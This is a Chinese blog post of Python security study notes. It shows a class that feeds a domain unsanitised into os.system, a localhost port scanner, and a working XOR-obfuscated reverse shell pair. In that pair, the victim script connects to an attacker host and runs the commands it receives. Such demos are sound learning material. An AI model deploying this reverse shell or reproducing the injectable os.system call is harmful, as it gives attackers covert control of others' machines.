fb.python-study.1

最新推荐文章于 2022-03-31 17:43:15 发布
最新推荐文章于 2022-03-31 17:43:15 发布
阅读量951 收藏
点赞数
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/airuozhaoyang/article/details/44343771
版权


0x01.python类

<p>#coding=utf-8
import os

class Domain:
    def __init__(self,domain,port,protocol):
        self.domain=domain
        self.port=port
        self.protocol=protocol
    def URL(self):
        if self.protocol=='https':
            URL='https://'+self.domain+':'+self.port+'/'
        if self.protocol=='http':
            URL='http://'+self.domain+':'+self.port+'/'
        return URL
    def lookup(self):
        os.system("host  "+self.domain)
        


if __name__=="__main__":
    domain=Domain('www.freebuf.com','80','http')
    print domain.URL()
    print domain.port
    print domain.protocol
    domain.lookup()
    
    

</p>

the end:

root@kali:~/Desktop# python ./test.py 
http://www.freebuf.com:80/
80
http
www.freebuf.com has address 123.151.180.21


enviroment: kali+py2.7.3


0x02 scan port

开机了本机的ssh也就是22端口。一个简单的演示。

#coding=utf-8

import socket
ports=[21,22,53,80,443,445,3389,5050,5678,8080,8081]
hosts=['127.0.0.1']

for host in hosts:
    for port in ports:
        try:
            s=socket.socket()
	    print "[+]Attempting to connect to "+host+":"+str(port)
	    s.connect((host,port))
            s.send('adsfsafdsfadfsadfasdfasdfas /n')
            banner=s.recv(1024)
            if banner:
                 print "[+]"+host+":"+str(port)+" open: \n"+banner
	    s.close()
	except:
	    pass
结果: 
root@kali:~/Desktop# python ./scan.py 
[+]Attempting to connect to 127.0.0.1:21
[+]Attempting to connect to 127.0.0.1:22
[+]127.0.0.1:22 open: 
SSH-2.0-OpenSSH_6.0p1 Debian-4+deb7u2

[+]Attempting to connect to 127.0.0.1:53
[+]Attempting to connect to 127.0.0.1:80
[+]Attempting to connect to 127.0.0.1:443
[+]Attempting to connect to 127.0.0.1:445
[+]Attempting to connect to 127.0.0.1:3389
[+]Attempting to connect to 127.0.0.1:5050
[+]Attempting to connect to 127.0.0.1:5678
[+]Attempting to connect to 127.0.0.1:8080
[+]Attempting to connect to 127.0.0.1:8081

这只是个示例程序吧 不实用、在扫一下不能既recv又send的程序时,会卡在recv上


0x03 Reverse Shell – 反向shell

一个简单的udp server-client.py

#coding=utf-8
import socket
host=''
port=1024
bufsize=128
addr=(host,port)
udp_server=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
udp_server.bind(addr)
while True:
    print 'waiting for message...'
    data,addr=udp_server.recvfrom(bufsize)
    print '...received from and return to:'+str(addr)+": "+data
udp_server.close()


#coding=utf-8

import socket
host='localhost'
port=1024
bufsize=128
addr=(host,port)
udp_client=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
while True:
    data=raw_input('>')
    if not data:
        break
    udp_client.sendto(data,addr)
udp_client.close()

接下来是一个反向shell的演示程序。

attacker.py

#coding=utf-8
import socket
"""
建立socket监听端口
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2048)
print "Listening on port 443... "
#接受连接  得到肉鸡
(client, (ip, port)) = s.accept()
print " recived connection from : ", ip
while True:
    command = raw_input('~$ ')
    encode = bytearray(command)
    for i in range(len(encode)):
        encode[i] ^= 0x41    
    client.send(encode)#send
    en_data = client.recv(2048)#recv 
    decode = bytearray(en_data)
    for i in range(len(decode)):
        decode[i] ^= 0x41
    print decode
client.close()
s.close()

shell.py

#!/usr/bin/python
import socket, subprocess, sys
RHOST = sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))
while True:
    # receive XOR encoded data from network socket
    data = s.recv(1024)
    # XOR the data again with a '\x41' to get back to normal data
    en_data = bytearray(data)
    for i in range(len(en_data)):
        en_data[i] ^= 0x41
    # Execute the decode data as a command.
    # The subprocess module is great because we can PIPE STDOUT/STDERR/STDIN to a variable
    comm = subprocess.Popen(str(en_data), shell = True, stdout = subprocess.PIPE, stderr = subprocess.PIPE, stdin = subprocess.PIPE)
    comm.wait()
    STDOUT, STDERR = comm.communicate()   
    print STDERR
    # Encode the output and send to RHOST
    en_STDOUT= bytearray(STDOUT)
    for i in range(len(en_STDOUT)):
        en_STDOUT[i] ^= 0x41
    s.send(en_STDOUT)
s.close()

从中可以看书 攻击者开启自己的443端口,然后在受害者上运行shell.py可使受害机器连接的攻击者的机器上,同时实用subprocess模块 执行由attacker发过来的命令,并将受害机器的命令回显发回到攻击者的机器上。 相当于一个远程shell吧。  并不是最标准的交互式shell。(nc反弹拿shell)







朝向高处的旅途
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python安装fbprophet以及测试
思过留痕
04-08 7389
1、环境介绍 Anaconda Python 3.6.5 + Win10 2、安装遇到的问题 ① C++编译 Win用户在安装前必需有C++编译器(下载地址:C++),如果电脑里装了vs2015或以上并且安装的时候勾选了C++。 ② 安装pystan pip install pystan 当出现错误提示:WARNING:pystan:MSVC compiler is not supported ...
python-fbprophet总结
08-22 4万+
时间序列预测一直是预测问题中的难点,人们很难找到一个适用场景丰富的通用模型,这是因为现实中每个预测问题的背景知识,例如数据的产生过程,往往是不同的,即使是同一类问题,影响这些预测值的因素与程度也往往不同,再加上预测问题往往需要大量专业的统计知识,这又给分析人员带来了难度,这些都使得时间序列预测问题变得尤其复杂。传统的时间序列预测方法通常有如下缺陷: 适用的时序数据过于局限 ...
Python安装fbprophet包
wuyanne的博客
12-26 5165
最初在notebook中想运行这样一段代码 from fbprophet import Prophet 但是遇到了非常多错误(最后是使用的conda下载的fbprophet 包,不清楚我前面升级的pip到底有没有帮助,可以直接从pystan库开始尝试) 首先,pip版本需要是最新版20.3.1 在线更新pip python -m pip install --upgrade pip 强制升级是,python -m pip install -U --force-reinstall pip 如果是把pip卸载,p
fblualib安装教程
kuaitoukid的专栏
06-24 7845
源码地址https://github.com/facebook/fblualib 整个安装教程都建立在你没有ROOT权限的情况下的,所以一切的安装都需要你打开shell脚本,一步步执行里面的安装指令,并且要修改很多因为没有root权限而造成的问题。
window下fbprophet的安装(都是血和泪)
riario的博客
04-02 2万+
2月14号FACEBOOK开源了可以通过 Python 和 R 语言使用的预测工具 Prophet。作为一个Windows用户,想在python上体验一下这个库,没想到安装之路满满都是坑。。。 fbprophet依赖于PyStan,所以首先要安装PyStan库,而要安装PyStan,首先要安装C++编译器Visual C++ Build Tools,选Download Visual C++
facebook prophet的探索(python语言)
wujushan的博客
03-22 2万+
facebook开源了时间序列预测框架prophet的使用
android-studio-2020.3.1.22-windows.zip
08-02
目前为官网最新版本,需要翻墙下载 下载链接: ...-windows.exe?mh=3E&pl=23&shardbypass=yes&redirect_counter=1&rm=sn...--sn-npoe7n7r.gvt1.com&smhost=r3---sn-npoeens7.gvt1.com
python-configshell-1.1.fb23-5.el7.noarch.rpm
11-30
离线安装包,亲测可用
SYSCLEANPRO.EXE-C7D8E7FB.pf
最新发布
01-12
SYSCLEANPRO.EXE-C7D8E7FB
fb.resnet.torch-master.zip_ResNet_ResNet深度学习_facebook_torch resn
09-20
1. `models`:存放不同变体的ResNet模型结构定义,如ResNet-18、ResNet-34、ResNet-50、ResNet-101和ResNet-152。 2. `train.lua`和`test.lua`:训练和测试模型的脚本,定义了优化器、损失函数、训练和验证循环等。 ...
Python库 | python-fb-0.1.tar.gz
05-21
资源分类:Python库 所属语言:Python 资源全名:python-fb-0.1.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法(勒索病毒原理)
人工智能
05-13 7117
工具下载 1、Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败): 复现python和pywin32安装包 (分流下载:http://pan.baidu.com/s/1jHKw0AU 密码:kuij) 2、Shadowbroker放出的NSA攻击工具 https://github.com/misterch0c/
python 读取数据出现UnicodeDecodeError:: 'utf-8' codec can't decode byte 0xc8 in position 0: invalid contin
热门推荐
Rookiekk
09-11 32万+
之前写程序时也出现过类似错误,每次解决了到第二次遇见又忘了具体方法,这次记录一下。 一、字符编码问题 先介绍一下字符编码问题 1.ASCLL与GB2312 由于计算机是美国人发明的,因此,最早只有127个字符被编码到计算机里,也就是大小写英文字母、数字和一些符号,这个编码表被称为ASCII编码,比如大写字母A的编码是65,小写字母z的编码是122。 但是要处理中文显然一个字节是不够的,至...
Facebook_scraper:Python获取FB用户的公开发帖【FaceBook系列 一】
CorGi_8456的博客
03-31 4339
明辨是非,勿迷失自我
如何安装Pythonfbprophet库
weixin_43697200的博客
12-01 3048
如何安装Pythonfbprophet库 在进行时间序列分析和预测中,由Facebook开发的开源fbprophet库是常用的一个库。在该库的安装过程中,常常容易发生一些问题,导致安装无法顺利完成。现将安装中的注意事项、可能遇到的问题及相应的解决方案总结如下: 一、Prophet的安装依赖于pystan库,所以,在安装prophet库前,需要先安装好pystan库。 二、pystan库的安装需要满足几个前提条件: 1、已安装python:建议采用python的发行版anaconda安装,因为anacon
python之读写文件
技术点滴记录
09-17 5861
fr=open("readfile.txt","r") fw=open("writefile.txt","w") print fr.readline() print fr.tell() print fr.readlines() fw.write("
方程式ETERNALBLUE 之fb.py的复现
weixin_34227447的博客
04-21 202
原文链接:https://www.t00ls.net/viewthread.php?tid=39343 转载于:https://www.cnblogs.com/hookjoy/p/6743020.html
方程式ETERNALBLUE 之fb.py的复现
weixin_34226706的博客
03-30 950
方程式ETERNALBLUE之fb.py的复现 1.环境简介***机win2003ip:192.168.1.105***机kali:ip:192.168.1.106靶机(被***机)window7 x64(未装smb漏洞补丁)ip:192.168.1.100 2.windows2003***机***机win2003安装环境:python-2.6.6.msihttps://www.python.o...
Python读取文件时出现UnicodeDecodeError: 'gbk' codec can't decode byte 0x80 in position xx: 解决方案
zhang__shuang_的博客
09-08 11万+
Python在读取文件时 with open('article.txt') as f: # 打开新的文本 text_new = f.read() # 读取文本数据 出现错误: UnicodeDecodeError: 'gbk' codec can't decode byte 0x80 in position 145: illegal multibyte sequence 此...
dev-peer0.org2.example.com-mycc-2.0-c7aee9ad18dddc18319f5f00199f05d866f9e61dca40c9af3e226d434ac4a63c latest b15ab53be779 3 days ago 141 MB dev-peer0.org1.example.com-mycc-2.0-2732cd4d96a0b88594aefca15581eaa0fb481ad15beeb86cc79931b2a90ee621 latest c098f5928759 3 days ago 141 MB dev-peer1.org2.example.com-mycc-1.0-26c2ef32838554aac4f7ad6f100aca865e87959c9a126e86d764c8d01f8346ab latest ec09f1ae27b2 5 days ago 141 MB dev-peer0.org1.example.com-mycc-1.0-384f11f484b9302df90b453200cfb25174305fce8f53f4e94d45ee3b6cab0ce9 latest 045f8bc073cb 5 days ago 141 MB dev-peer0.org2.example.com-mycc-1.0-15b571b3ce849066b7ec74497da3b27e54e0df1345daff3951b94245ce09c42b latest 4f3c2cca53e7 5 days ago 141 MB
05-25
例如,`dev-peer0.org1.example.com-mycc-1.0-384f11f484b9302df90b453200cfb25174305fce8f53f4e94d45ee3b6cab0ce9` 表示组织 org1.example.com 中的 peer0 节点上运行的名为 mycc、版本为 1.0 的链代码镜像。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值